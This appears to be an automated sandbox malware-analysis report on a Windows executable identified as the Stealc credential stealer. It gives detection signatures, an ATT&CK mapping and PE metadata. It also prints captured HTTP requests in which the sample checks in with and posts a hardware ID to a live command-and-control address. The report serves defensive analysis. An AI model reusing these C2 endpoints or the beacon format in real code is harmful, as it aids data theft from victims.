                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_005D7850
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_005D9600
                Source: file.exe, file.exe, 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: DjF=Program Manager
                Source: file.exe, 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: oDjF=Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_005D7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_005D6920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_005D7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_005D7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.5c0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2161251258.00000000052F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.5c0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2161251258.00000000052F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture13
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/ws100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                198.187.3.20.in-addr.arpa
                		unknown
                		unknownfalse
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://185.215.113.37/true
                  • URL Reputation: malware
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phptrue
                  • URL Reputation: malware
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.215.113.37file.exe, 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phpuLfile.exe, 00000000.00000002.2215149403.00000000014E9000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37Lfile.exe, 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/wsfile.exe, 00000000.00000002.2215149403.00000000014E9000.00000004.00000020.00020000.00000000.sdmptrue
                      • URL Reputation: malware
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      185.215.113.37
                      		unknownPortugal
                      		206894WHOLESALECONNECTIONSNLtrue

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1532741
                      Start date and time:2024-10-13 21:03:08 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 5m 11s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:5
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@1/0@1/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 80%
                      • Number of executed functions: 19
                      • Number of non-executed functions: 85
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: file.exe

                      Simulations

                      Behavior and APIs

                      No simulations

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      No created / dropped files found

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.9478766132001075
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:1'854'976 bytes
                      MD5:054dffcd797e0e40c9e7b3050814f148
                      SHA1:d5d545a246bb31a238e4a2632bdc878a35bd8d7e
                      SHA256:6dbfc677cbb25ac652a97431f9afc4811639b3dae9b640976c0b9bb8d9a54404
                      SHA512:b03a463b63730b096ceabda5deefd631199b89e79e56f8e8a0bdf8f7b14f0ec89998ac65acfd8ef18bbe9b863d14a3bb2f3424974a3b1fb53e6323d5d97be61e
                      SSDEEP:49152:PN3hmoVX/5v537z9p56k9SrdZrsIip8GIJSHfdafIYxJj8Q:nm21537z9p4nrzsIJJS/d1Oj8
                      TLSH:278533872BE96C71E6F9DB764A0F3E47E2B22FD8418363FB9404D05909A5C715A3D02B
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                      File Icon

                      Icon Hash:00928e8e8686b000

                      Static PE Info

                      General

                      Entrypoint:0xaa1000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                      Entrypoint Preview

                      Instruction
                      jmp 00007F7F14B4C8FAh
                      cvttps2pi mm3, qword ptr [eax+eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      jmp 00007F7F14B4E8F5h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al

                      Rich Headers

                      Programming Language:
                      • [C++] VS2010 build 30319
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [LNK] VS2010 build 30319

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      0x10000x25b0000x22800d80fe44726714cd804974098735d69c0unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      0x25e0000x2a30000x200d87aaad9220892c0cc0bf5df02e89980unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      yhphlozs0x5010000x19f0000x19ea0035f5083384d3f7726e928914ac15fff2False0.9949685097603256data7.95378057749378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      rdjojuwm0x6a00000x10000x6000d20971c6dbd5bdf53ced50d55ccd832False0.6028645833333334data5.1654108440726985IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .taggant0x6a10000x30000x2200927926d4e56e47d895a14e19cf718572False0.00666360294117647DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                      Imports

                      DLLImport
                      kernel32.dlllstrcpy

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                      2024-10-13T21:04:08.967465+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.649711185.215.113.3780TCP

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Oct 13, 2024 21:04:07.949281931 CEST4971180192.168.2.6185.215.113.37
                      Oct 13, 2024 21:04:07.954263926 CEST8049711185.215.113.37192.168.2.6
                      Oct 13, 2024 21:04:07.954368114 CEST4971180192.168.2.6185.215.113.37
                      Oct 13, 2024 21:04:07.954925060 CEST4971180192.168.2.6185.215.113.37
                      Oct 13, 2024 21:04:07.959793091 CEST8049711185.215.113.37192.168.2.6
                      Oct 13, 2024 21:04:08.684165955 CEST8049711185.215.113.37192.168.2.6
                      Oct 13, 2024 21:04:08.684417963 CEST4971180192.168.2.6185.215.113.37
                      Oct 13, 2024 21:04:08.731739044 CEST4971180192.168.2.6185.215.113.37
                      Oct 13, 2024 21:04:08.736891031 CEST8049711185.215.113.37192.168.2.6
                      Oct 13, 2024 21:04:08.967363119 CEST8049711185.215.113.37192.168.2.6
                      Oct 13, 2024 21:04:08.967464924 CEST4971180192.168.2.6185.215.113.37
                      Oct 13, 2024 21:04:12.519870996 CEST4971180192.168.2.6185.215.113.37

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Oct 13, 2024 21:04:35.364052057 CEST5358413162.159.36.2192.168.2.6
                      Oct 13, 2024 21:04:35.922825098 CEST5940753192.168.2.61.1.1.1
                      Oct 13, 2024 21:04:35.930768967 CEST53594071.1.1.1192.168.2.6

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Oct 13, 2024 21:04:35.922825098 CEST192.168.2.61.1.1.10xfd8aStandard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Oct 13, 2024 21:04:35.930768967 CEST1.1.1.1192.168.2.60xfd8aName error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • 185.215.113.37

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.649711185.215.113.37804392C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Oct 13, 2024 21:04:07.954925060 CEST89OUTGET / HTTP/1.1
                      Host: 185.215.113.37
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Oct 13, 2024 21:04:08.684165955 CEST203INHTTP/1.1 200 OK
                      Date: Sun, 13 Oct 2024 19:04:08 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Content-Length: 0
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Oct 13, 2024 21:04:08.731739044 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----AFHDAEGHDGDBGDGDAAFI
                      Host: 185.215.113.37
                      Content-Length: 211
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 39 44 33 34 39 31 34 36 41 38 42 32 37 36 38 32 33 36 36 34 33 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 2d 2d 0d 0a
                      Data Ascii: ------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="hwid"D9D349146A8B2768236643------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="build"doma------AFHDAEGHDGDBGDGDAAFI--
                      Oct 13, 2024 21:04:08.967363119 CEST210INHTTP/1.1 200 OK
                      Date: Sun, 13 Oct 2024 19:04:08 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Content-Length: 8
                      Keep-Alive: timeout=5, max=99
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 59 6d 78 76 59 32 73 3d
                      Data Ascii: YmxvY2s=


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      System Behavior

                      General

                      Target ID:0
                      Start time:15:04:02
                      Start date:13/10/2024
                      Path:C:\Users\user\Desktop\file.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\file.exe"
                      Imagebase:0x5c0000
                      File size:1'854'976 bytes
                      MD5 hash:054DFFCD797E0E40C9E7B3050814F148
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2161251258.00000000052F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:8.2%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:9.7%
                        Total number of Nodes:2000
                        Total number of Limit Nodes:24
                        execution_graph 13195 5d69f0 13240 5c2260 13195->13240 13219 5d6a64 13220 5da9b0 4 API calls 13219->13220 13221 5d6a6b 13220->13221 13222 5da9b0 4 API calls 13221->13222 13223 5d6a72 13222->13223 13224 5da9b0 4 API calls 13223->13224 13225 5d6a79 13224->13225 13226 5da9b0 4 API calls 13225->13226 13227 5d6a80 13226->13227 13392 5da8a0 13227->13392 13229 5d6b0c 13396 5d6920 GetSystemTime 13229->13396 13231 5d6a89 13231->13229 13233 5d6ac2 OpenEventA 13231->13233 13235 5d6ad9 13233->13235 13236 5d6af5 CloseHandle Sleep 13233->13236 13239 5d6ae1 CreateEventA 13235->13239 13237 5d6b0a 13236->13237 13237->13231 13239->13229 13593 5c45c0 13240->13593 13242 5c2274 13243 5c45c0 2 API calls 13242->13243 13244 5c228d 13243->13244 13245 5c45c0 2 API calls 13244->13245 13246 5c22a6 13245->13246 13247 5c45c0 2 API calls 13246->13247 13248 5c22bf 13247->13248 13249 5c45c0 2 API calls 13248->13249 13250 5c22d8 13249->13250 13251 5c45c0 2 API calls 13250->13251 13252 5c22f1 13251->13252 13253 5c45c0 2 API calls 13252->13253 13254 5c230a 13253->13254 13255 5c45c0 2 API calls 13254->13255 13256 5c2323 13255->13256 13257 5c45c0 2 API calls 13256->13257 13258 5c233c 13257->13258 13259 5c45c0 2 API calls 13258->13259 13260 5c2355 13259->13260 13261 5c45c0 2 API calls 13260->13261 13262 5c236e 13261->13262 13263 5c45c0 2 API calls 13262->13263 13264 5c2387 13263->13264 13265 5c45c0 2 API calls 13264->13265 13266 5c23a0 13265->13266 13267 5c45c0 2 API calls 13266->13267 13268 5c23b9 13267->13268 13269 5c45c0 2 API calls 13268->13269 13270 5c23d2 13269->13270 13271 5c45c0 2 API calls 13270->13271 13272 5c23eb 13271->13272 13273 5c45c0 2 API calls 13272->13273 13274 5c2404 13273->13274 13275 5c45c0 2 API calls 13274->13275 13276 5c241d 13275->13276 13277 5c45c0 2 API calls 13276->13277 13278 5c2436 13277->13278 13279 5c45c0 2 API calls 13278->13279 13280 5c244f 13279->13280 13281 5c45c0 2 API calls 13280->13281 13282 5c2468 13281->13282 13283 5c45c0 2 API calls 13282->13283 13284 5c2481 13283->13284 13285 5c45c0 2 API calls 13284->13285 13286 5c249a 13285->13286 13287 5c45c0 2 API calls 13286->13287 13288 5c24b3 13287->13288 13289 5c45c0 2 API calls 13288->13289 13290 5c24cc 13289->13290 13291 5c45c0 2 API calls 13290->13291 13292 5c24e5 13291->13292 13293 5c45c0 2 API calls 13292->13293 13294 5c24fe 13293->13294 13295 5c45c0 2 API calls 13294->13295 13296 5c2517 13295->13296 13297 5c45c0 2 API calls 13296->13297 13298 5c2530 13297->13298 13299 5c45c0 2 API calls 13298->13299 13300 5c2549 13299->13300 13301 5c45c0 2 API calls 13300->13301 13302 5c2562 13301->13302 13303 5c45c0 2 API calls 13302->13303 13304 5c257b 13303->13304 13305 5c45c0 2 API calls 13304->13305 13306 5c2594 13305->13306 13307 5c45c0 2 API calls 13306->13307 13308 5c25ad 13307->13308 13309 5c45c0 2 API calls 13308->13309 13310 5c25c6 13309->13310 13311 5c45c0 2 API calls 13310->13311 13312 5c25df 13311->13312 13313 5c45c0 2 API calls 13312->13313 13314 5c25f8 13313->13314 13315 5c45c0 2 API calls 13314->13315 13316 5c2611 13315->13316 13317 5c45c0 2 API calls 13316->13317 13318 5c262a 13317->13318 13319 5c45c0 2 API calls 13318->13319 13320 5c2643 13319->13320 13321 5c45c0 2 API calls 13320->13321 13322 5c265c 13321->13322 13323 5c45c0 2 API calls 13322->13323 13324 5c2675 13323->13324 13325 5c45c0 2 API calls 13324->13325 13326 5c268e 13325->13326 13327 5d9860 13326->13327 13598 5d9750 GetPEB 13327->13598 13329 5d9868 13330 5d987a 13329->13330 13331 5d9a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13329->13331 13336 5d988c 21 API calls 13330->13336 13332 5d9b0d 13331->13332 13333 5d9af4 GetProcAddress 